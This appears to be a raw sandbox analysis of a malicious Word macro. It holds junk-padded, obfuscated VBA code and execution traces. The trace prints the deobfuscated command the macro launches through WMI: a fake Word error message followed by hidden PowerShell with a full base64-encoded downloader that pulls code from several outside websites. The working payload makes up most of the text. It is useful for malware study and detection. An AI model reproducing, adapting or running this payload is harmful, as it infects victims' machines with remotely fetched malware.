                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: YjbuICHY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: rUIOAx

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      GlHkEN

                      Fix

                      shylMG

                      shylMG

                      Fix

                      Fix

                      CreateObject

                      		CreateObject("winmgmts:win32_process")

                      nDpnHa

                      Fix

                      neULB

                      neULB

                      Fix

                      Fix

                      SgwfJAm

                      Fix

                      aDUvJDOI

                      aDUvJDOI

                      Fix

                      Fix

                      GqPOTjZ

                      Fix

                      xSGbCJ

                      xSGbCJ

                      Fix

                      Fix

                      Create

                      		SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEAAJwArACgAJwB3ACcAKwAnAF0AeABtAFsAJwApACsAKAAnAHYAOgAvACcAKwAnAC8AJwApACsAKAAnAHcAdwAnACsAJwB3ACcAKQArACgAJwAuAGEAZwByACcAKwAnAGkAJwArACcAYwBhAG0AcAAnACsAJwBlAGcAJwApACsAKAAnAGcAaQAnACsAJwBvACcAKwAnAGMAbwByACcAKQArACgAJwB0AGUAJwArACcAYwBvAG0AbwAnACkAKwAnAHQAdAAnACsAJwBvAC4AJwArACgAJwBpAHQAJwArACcALwAnACkAKwAoACcAdwBwACcAKwAnAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACgAJwBpACcAKwAnAG4AJwArACcALwBzADcAJwArACcAcAAxAC8AQAB3AF0AJwArACcAeABtAFsAJwApACsAJwB2ACcAKwAnAHMAOgAnACsAJwAvAC8AJwArACcAdwB3ACcAKwAnAHcAJwArACgAJwAuAHMAdABhAHIAbAAnACsAJwBpACcAKwAnAG4AJwApACsAKAAnAGcAdABlAGMAaABzAC4AYwBvAG0AJwArACcALwAnACsAJwBHAE4ATQAnACsAJwAvAEAAdwAnACsAJwBdAHgAbQBbAHYAJwApACsAKAAnADoAJwArACcALwAnACsAJwAvAGgAZQBsAGwAYQBzACcAKQArACgAJwAtAGQAJwArACcAYQByAG0AcwAnACsAJwB0AGEAZAAnACsAJwB0AC4AZAAnACsAJwBlACcAKQArACcALwBjACcAKwAoACcAZwBpAC0AYgBpAG4AJwArACcALwBaACcAKQArACcAUwAnACsAKAAnAG8AJwArACcAbwAvACcAKQApAC4AIgByAEUAcABsAEEAYABjAGUAIgAoACgAKAAnAHcAXQB4AG0AJwArACcAWwAnACkAKwAnAHYAJwApACwAKABbAGEAcgByAGEAeQBdACgAKAAnAGQAcwAnACsAKAAnAGUAJwArACcAdwBmACcAKQApACwAKAA,,) -> 0

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: zCXyyY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: JSrfhd

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: szALCGBF

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: XFTxEQJDN

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: YjbuICHY

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: RXvmIZQm

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: rUIOAx

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: gIKrmCJj

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Part of subcall function Ipls8rqp952u2lk1@Gx8fznt8p0b: Fix

                      Mid

                      Len

                      		Len("\x01 w]xm[vw]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[vcw]xm[vmw]xm[vdw]xm[v w]xm[v/w]xm[vcw]xm[v w]xm[vmw]xm[v^w]xm[vsw]xm[v^w]xm[vgw]xm[v w]xm[v%w]xm[vuw]xm[vsw]xm[vew]xm[vrw]xm[vnw]xm[vaw]xm[vmw]xm[vew]xm[v%w]xm[v w]xm[v/w]xm[vvw]xm[v w]xm[vWw]xm[vow]xm[v^w]xm[vrw]xm[vdw]xm[v w]xm[vew]xm[vxw]xm[vpw]xm[v^w]xm[vew]xm[vrw]xm[viw]xm[vew]xm[vnw]xm[v^w]xm[vcw]xm[vew]xm[vdw]xm[v w]xm[vaw]xm[vnw]xm[v w]xm[vew]xm[vrw]xm[v^w]xm[vrw]xm[vow]xm[vrw]xm[v w]xm[vtw]xm[vrw]xm[vyw]xm[viw]xm[v^w]xm[vnw]xm[vgw]xm[v w]xm[vtw]xm[vow]xm[v w]xm[vow]xm[vpw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[vtw]xm[vhw]xm[v^w]xm[vew]xm[v w]xm[vfw]xm[viw]xm[v^w]xm[vlw]xm[vew]xm[v.w]xm[v w]xm[v&w]xm[v w]xm[vpw]xm[v^w]xm[vow]xm[vww]xm[vew]xm[v^w]xm[vrw]xm[vsw]xm[v^w]xm[vhw]xm[vew]xm[v^w]xm[vlw]xm[vlw]xm[v^w]xm[v w]xm[v-w]xm[vww]xm[v w]xm[vhw]xm[viw]xm[v^w]xm[vdw]xm[vdw]xm[v^w]xm[vew]xm[vnw]xm[v w]xm[v-w]xm[v^w]xm[vew]xm[v^w]xm[vnw]xm[vcw]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v w]xm[v IAAw]xm[vgACw]xm[vQAOw]xm[vABaw]xm[vAEcw]xm[vAIAw]xm[vAgAw]xm[vD0Aw]xm[vIABw]xm[vbAHw]xm[vQAWw]xm[vQBww]xm[vAGUw]xm[vAXQw]xm[vAoAw]xm[vCIAw]xm[vewAw]xm[vyAHw]xm[v0Aew]xm[vwA1w]xm[vAH0w]xm[vAeww]xm[vAwAw]xm[vH0Aw]xm[vewAw]xm[vxAHw]xm[v0Aew]xm[vwAzw]xm[vAH0w]xm[vAeww]xm[vA0Aw]xm[vH0Aw]xm[vIgAw]xm[vtAGw]xm[vYAIw]xm[vAAnw]xm[vAFQw]xm[vARQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vtACw]xm[v4AJw]xm[vwAsw]xm[vACcw]xm[vAUww]xm[vB5Aw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkAbw]xm[vwAnw]xm[vACww]xm[vAJww]xm[vAuAw]xm[vEQAw]xm[vSQBw]xm[vyAEw]xm[vUAQw]xm[vwB0w]xm[vAE8w]xm[vAUgw]xm[vBZAw]xm[vCcAw]xm[vLAAw]xm[vnAFw]xm[vMAJw]xm[vwApw]xm[vADsw]xm[vAIAw]xm[vAgAw]xm[vCAAw]xm[vJABw]xm[vEADw]xm[vAAQw]xm[vwBxw]xm[vACAw]xm[vAPQw]xm[vAgAw]xm[vFsAw]xm[vVABw]xm[vZAHw]xm[vAAZw]xm[vQBdw]xm[vACgw]xm[vAIgw]xm[vB7Aw]xm[vDIAw]xm[vfQBw]xm[v7ADw]xm[vEAfw]xm[vQB7w]xm[vADAw]xm[vAfQw]xm[vB7Aw]xm[vDMAw]xm[vfQBw]xm[v7ADw]xm[vQAfw]xm[vQAiw]xm[vACAw]xm[vALQw]xm[vBmAw]xm[vCcAw]xm[vcwBw]xm[vFAHw]xm[vIAdw]xm[vgBJw]xm[vAEMw]xm[vARQw]xm[vBQAw]xm[vG8Aw]xm[vJwAw]xm[vsACw]xm[vcAVw]xm[vABlw]xm[vAG0w]xm[vALgw]xm[vBuAw]xm[vEUAw]xm[vdAAw]xm[vuACw]xm[vcALw]xm[vAAnw]xm[vAFMw]xm[vAWQw]xm[vBzAw]xm[vCcAw]xm[vLAAw]xm[vnAGw]xm[vkATw]xm[vgB0w]xm[vAG0w]xm[vAYQw]xm[vAnAw]xm[vCwAw]xm[vJwBw]xm[vuAEw]xm[vEARw]xm[vwBFw]xm[vAFIw]xm[vAJww]xm[vApAw]xm[vCAAw]xm[vOwAw]xm[vgACw]xm[vQASw]xm[vgBiw]xm[vAHow]xm[vAMww]xm[vB5Aw]xm[vGEAw]xm[vYQAw]xm[v9ACw]xm[vQARw]xm[vAA1w]xm[vADMw]xm[vARQw]xm[vAgAw]xm[vCsAw]xm[vIABw]xm[vbAGw]xm[vMAaw]xm[vABhw]xm[vAHIw]xm[vAXQw]xm[vAoAw]xm[vDYAw]xm[vNAAw]xm[vpACw]xm[vAAKw]xm[vwAgw]xm[vACQw]xm[vAUgw]xm[vA3Aw]xm[vDYAw]xm[vUAAw]xm[v7ACw]xm[vQARw]xm[vwA3w]xm[vADMw]xm[vATww]xm[vA9Aw]xm[vCgAw]xm[vJwBw]xm[vGACw]xm[vcAKw]xm[vwAow]xm[vACcw]xm[vAMAw]xm[vAnAw]xm[vCsAw]xm[vJwAw]xm[v0AFw]xm[vYAJw]xm[vwApw]xm[vACkw]xm[vAOww]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vgACw]xm[vAARw]xm[vwBlw]xm[vAHQw]xm[vALQw]xm[vBWAw]xm[vGEAw]xm[vcgBw]xm[vJAEw]xm[vEAQw]xm[vgBsw]xm[vAGUw]xm[vAIAw]xm[vAoAw]xm[vCIAw]xm[vOABw]xm[vaACw]xm[vIAKw]xm[vwAiw]xm[vAGcw]xm[vAIgw]xm[vApAw]xm[vCAAw]xm[vIAAw]xm[vtAHw]xm[vYAQw]xm[vQBsw]xm[vAFUw]xm[vAZQw]xm[vBPAw]xm[vE4Aw]xm[vIAAw]xm[vpADw]xm[voAOw]xm[vgAiw]xm[vAGMw]xm[vAcgw]xm[vBFAw]xm[vGAAw]xm[vQQBw]xm[vgAFw]xm[vQAZw]xm[vQBEw]xm[vAGkw]xm[vAUgw]xm[vBgAw]xm[vGUAw]xm[vQwBw]xm[v0AGw]xm[vAAbw]xm[vwBSw]xm[vAHkw]xm[vAIgw]xm[vAoAw]xm[vCQAw]xm[vSABw]xm[vPAEw]xm[v0ARw]xm[vQAgw]xm[vACsw]xm[vAIAw]xm[vAoAw]xm[vCgAw]xm[vJwBw]xm[v0AEw]xm[vsAJw]xm[vwArw]xm[vACgw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKwAw]xm[vnAEw]xm[vsAJw]xm[vwArw]xm[vACcw]xm[vAagw]xm[vBsAw]xm[vDQAw]xm[vOABw]xm[vrAHw]xm[vIAJw]xm[vwApw]xm[vACsw]xm[vAJww]xm[vB0Aw]xm[vCcAw]xm[vKwAw]xm[voACw]xm[vcASw]xm[vwBMw]xm[vAE4w]xm[vAcQw]xm[vAnAw]xm[vCsAw]xm[vJwBw]xm[vtADw]xm[vkAJw]xm[vwApw]xm[vACsw]xm[vAKAw]xm[vAnAw]xm[vHQAw]xm[vJwAw]xm[vrACw]xm[vcAew]xm[vQA5w]xm[vACcw]xm[vAKQw]xm[vArAw]xm[vCcAw]xm[vdAAw]xm[vnACw]xm[vsAJw]xm[vwBLw]xm[vAEww]xm[vAJww]xm[vApAw]xm[vC0Aw]xm[vcgBw]xm[vlAHw]xm[vAAbw]xm[vABBw]xm[vAGMw]xm[vAZQw]xm[vAgAw]xm[vCAAw]xm[vKAAw]xm[vnAHw]xm[vQASw]xm[vwAnw]xm[vACsw]xm[vAJww]xm[vBMAw]xm[vCcAw]xm[vKQAw]xm[vsAFw]xm[vsAQw]xm[vwBIw]xm[vAEEw]xm[vAcgw]xm[vBdAw]xm[vDkAw]xm[vMgAw]xm[v) -> 16527

                      Vc1971csmq7a5g9

                      W7x42qfm4_lw

                      dUNUgHJG

                      Fix

                      kshfoytP

                      kshfoytP

                      Fix

                      Fix

                      SetWuCGdA

                      Fix

                      ZYHZlIii

                      ZYHZlIii

                      Fix

                      Fix

                      StringsDecrypted Strings
                      "w]xm[vpw]xm[v"
                      "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"
                      "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"
                      "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"
                      "w]xm[vw]xm[v"
                      LineInstructionMeta Information
                      2

                      Function Bn2p1rxokklh_9o8()

                      3

                      On Error Resume Next

                      executed
                      4

                      Ypgqgc4wnez0kz = Xaem5y61ivq

                      Xaem5y61ivq

                      5

                      dsfe = Hj9iyfe3bvb + Kyl0l3rqw280c6ssa.StoryRanges(wdMainTextStory) + Xrsb1iydy1_t2h

                      Hj9iyfe3bvb

                      StoryRanges

                      wdMainTextStory

                      Xrsb1iydy1_t2h

                      6

                      Goto BzbdEl

                      7

                      Set CuCzGCw = ykgfGkNf

                      ykgfGkNf

                      8

                      Dim BhhWnCHb as Double

                      9

                      BhhWnCHb = Fix(BzbdEl)

                      Fix

                      BzbdEl

                      10

                      If BhhWnCHb <> BzbdEl Then

                      BzbdEl

                      10

                      Exit Function

                      10

                      Endif

                      11

                      Dim sJrfKHHt as Double

                      12

                      sJrfKHHt = BhhWnCHb ^ (1 / 3)

                      13

                      If Fix(sJrfKHHt) ^ 3 = BhhWnCHb Then

                      Fix

                      14

                      iKSwBkUWG = True

                      15

                      Elseif (Fix(sJrfKHHt) + 1) ^ 3 = BhhWnCHb Then

                      Fix

                      16

                      iKSwBkUWG = True

                      17

                      Endif

                      17

                      BzbdEl:

                      19

                      g42 = "w]xm[vpw]xm[v"

                      20

                      Nux0owfnim4 = "w]xm[vrow]xm[vw]xm[vcew]xm[vsw]xm[vsw]xm[vw]xm[v"

                      21

                      Goto JfXdCsEp

                      22

                      Set xTZpYXiBF = mZXJjJAgq

                      mZXJjJAgq

                      23

                      Dim DheYzB as Double

                      24

                      DheYzB = Fix(JfXdCsEp)

                      Fix

                      JfXdCsEp

                      25

                      If DheYzB <> JfXdCsEp Then

                      JfXdCsEp

                      25

                      Exit Function

                      25

                      Endif

                      26

                      Dim fRfgHB as Double

                      27

                      fRfgHB = DheYzB ^ (1 / 3)

                      28

                      If Fix(fRfgHB) ^ 3 = DheYzB Then

                      Fix

                      29

                      cMaNE = True

                      30

                      Elseif (Fix(fRfgHB) + 1) ^ 3 = DheYzB Then

                      Fix

                      31

                      cMaNE = True

                      32

                      Endif

                      32

                      JfXdCsEp:

                      34

                      Tkegc8hi7tjrwtr9oa = "w]xm[v:ww]xm[vw]xm[vinw]xm[v3w]xm[v2w]xm[v_w]xm[v"

                      35

                      Goto DJlZDCM

                      36

                      Set TgbVU = MSsFhG

                      MSsFhG

                      37

                      Dim NfAUFNI as Double

                      38

                      NfAUFNI = Fix(DJlZDCM)

                      Fix

                      DJlZDCM

                      39

                      If NfAUFNI <> DJlZDCM Then

                      DJlZDCM

                      39

                      Exit Function

                      39

                      Endif

                      40

                      Dim tYFukEBCC as Double

                      41

                      tYFukEBCC = NfAUFNI ^ (1 / 3)

                      42

                      If Fix(tYFukEBCC) ^ 3 = NfAUFNI Then

                      Fix

                      43

                      MwLbBJBFI = True

                      44

                      Elseif (Fix(tYFukEBCC) + 1) ^ 3 = NfAUFNI Then

                      Fix

                      45

                      MwLbBJBFI = True

                      46

                      Endif

                      46

                      DJlZDCM:

                      48

                      Aquvchbfc1s = "ww]xm[vinw]xm[vmw]xm[vgmw]xm[vtw]xm[vw]xm[v"

                      49

                      Goto QWDldHHR

                      50

                      Set UnYMEIiCD = VDhTuRJ

                      VDhTuRJ

                      51

                      Dim hzXmmAn as Double

                      52

                      hzXmmAn = Fix(QWDldHHR)

                      Fix

                      QWDldHHR

                      53

                      If hzXmmAn <> QWDldHHR Then

                      QWDldHHR

                      53

                      Exit Function

                      53

                      Endif

                      54

                      Dim AiEWeBgBl as Double

                      55

                      AiEWeBgBl = hzXmmAn ^ (1 / 3)

                      56

                      If Fix(AiEWeBgBl) ^ 3 = hzXmmAn Then

                      Fix

                      57

                      jzjFFpDhA = True

                      58

                      Elseif (Fix(AiEWeBgBl) + 1) ^ 3 = hzXmmAn Then

                      Fix

                      59

                      jzjFFpDhA = True

                      60

                      Endif

                      60

                      QWDldHHR:

                      62

                      Wut_mfci5kk4lb = "w]xm[vw]xm[v" + Mid(Application.Name, 4 + 2, 2 - 1) + "w]xm[vw]xm[v"

                      Mid

                      Name

                      Application

                      63

                      Goto reejhCJo

                      64

                      Set TMBZGWW = FBkjB

                      FBkjB

                      65

                      Dim eEAOBGE as Double

                      66

                      eEAOBGE = Fix(reejhCJo)

                      Fix

                      reejhCJo

                      67

                      If eEAOBGE <> reejhCJo Then

                      reejhCJo

                      67

                      Exit Function

                      67

                      Endif

                      68

                      Dim cYdfo as Double

                      69

                      cYdfo = eEAOBGE ^ (1 / 3)

                      70

                      If Fix(cYdfo) ^ 3 = eEAOBGE Then

                      Fix

                      71

                      tqIkDIrD = True

                      72

                      Elseif (Fix(cYdfo) + 1) ^ 3 = eEAOBGE Then

                      Fix

                      73

                      tqIkDIrD = True

                      74

                      Endif

                      74

                      reejhCJo:

                      76

                      Kj4qbrmlwd2552l4 = Aquvchbfc1s + Wut_mfci5kk4lb + Tkegc8hi7tjrwtr9oa + g42 + Nux0owfnim4

                      77

                      Goto PNjoAGP

                      78

                      Set OkSpwDa = ICwOHad

                      ICwOHad

                      79

                      Dim lmdMEA as Double

                      80

                      lmdMEA = Fix(PNjoAGP)

                      Fix

                      PNjoAGP

                      81

                      If lmdMEA <> PNjoAGP Then

                      PNjoAGP

                      81

                      Exit Function

                      81

                      Endif

                      82

                      Dim ZJLnFB as Double

                      83

                      ZJLnFB = lmdMEA ^ (1 / 3)

                      84

                      If Fix(ZJLnFB) ^ 3 = lmdMEA Then

                      Fix

                      85

                      fZVmJ = True

                      86

                      Elseif (Fix(ZJLnFB) + 1) ^ 3 = lmdMEA Then

                      Fix

                      87

                      fZVmJ = True

                      88

                      Endif

                      88

                      PNjoAGP:

                      90

                      Ls12h2gypqhb = Ipls8rqp952u2lk1(Kj4qbrmlwd2552l4)

                      91

                      Goto shylMG

                      92

                      Set cuCYC = GlHkEN

                      GlHkEN

                      93

                      Dim THkIAUF as Double

                      94

                      THkIAUF = Fix(shylMG)

                      Fix

                      shylMG

                      95

                      If THkIAUF <> shylMG Then

                      shylMG

                      95

                      Exit Function

                      95

                      Endif

                      96

                      Dim CcLHCeb as Double

                      97

                      CcLHCeb = THkIAUF ^ (1 / 3)

                      98

                      If Fix(CcLHCeb) ^ 3 = THkIAUF Then

                      Fix

                      99

                      rvmetA = True

                      100

                      Elseif (Fix(CcLHCeb) + 1) ^ 3 = THkIAUF Then

                      Fix

                      101

                      rvmetA = True

                      102

                      Endif

                      102

                      shylMG:

                      104

                      Set Sy6vvpgixx8z_5f = CreateObject(Ls12h2gypqhb)

                      CreateObject("winmgmts:win32_process")

                      executed
                      105

                      Goto neULB

                      106

                      Set gpBWaEPFj = nDpnHa

                      nDpnHa

                      107

                      Dim aEWwP as Double

                      108

                      aEWwP = Fix(neULB)

                      Fix

                      neULB

                      109

                      If aEWwP <> neULB Then

                      neULB

                      109

                      Exit Function

                      109

                      Endif

                      110

                      Dim PgRakD as Double

                      111

                      PgRakD = aEWwP ^ (1 / 3)

                      112

                      If Fix(PgRakD) ^ 3 = aEWwP Then

                      Fix

                      113

                      PohBnF = True

                      114

                      Elseif (Fix(PgRakD) + 1) ^ 3 = aEWwP Then

                      Fix

                      115

                      PohBnF = True

                      116

                      Endif

                      116

                      neULB:

                      118

                      Goto aDUvJDOI

                      119

                      Set gpIBBDhi = SgwfJAm

                      SgwfJAm

                      120

                      Dim ulfWCCiFF as Double

                      121

                      ulfWCCiFF = Fix(aDUvJDOI)

                      Fix

                      aDUvJDOI

                      122

                      If ulfWCCiFF <> aDUvJDOI Then

                      aDUvJDOI

                      122

                      Exit Function

                      122

                      Endif

                      123

                      Dim bONvDCElF as Double

                      124

                      bONvDCElF = ulfWCCiFF ^ (1 / 3)

                      125

                      If Fix(bONvDCElF) ^ 3 = ulfWCCiFF Then

                      Fix

                      126

                      MybcQH = True

                      127

                      Elseif (Fix(bONvDCElF) + 1) ^ 3 = ulfWCCiFF Then

                      Fix

                      128

                      MybcQH = True

                      129

                      Endif

                      129

                      aDUvJDOI:

                      131

                      Goto xSGbCJ

                      132

                      Set WJzJI = GqPOTjZ

                      GqPOTjZ

                      133

                      Dim UYbmGGDC as Double

                      134

                      UYbmGGDC = Fix(xSGbCJ)

                      Fix

                      xSGbCJ

                      135

                      If UYbmGGDC <> xSGbCJ Then

                      xSGbCJ

                      135

                      Exit Function

                      135

                      Endif

                      136

                      Dim nYjBpD as Double

                      137

                      nYjBpD = UYbmGGDC ^ (1 / 3)

                      138

                      If Fix(nYjBpD) ^ 3 = UYbmGGDC Then

                      Fix

                      139

                      HRHrHJDlD = True

                      140

                      Elseif (Fix(nYjBpD) + 1) ^ 3 = UYbmGGDC Then

                      Fix

                      141

                      HRHrHJDlD = True

                      142

                      Endif

                      142

                      xSGbCJ:

                      144

                      Sy6vvpgixx8z_5f.Create Ipls8rqp952u2lk1(Mid(dsfe, (1 + 4), Len(dsfe))), Vc1971csmq7a5g9, W7x42qfm4_lw

                      SWbemObjectEx.Create("cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 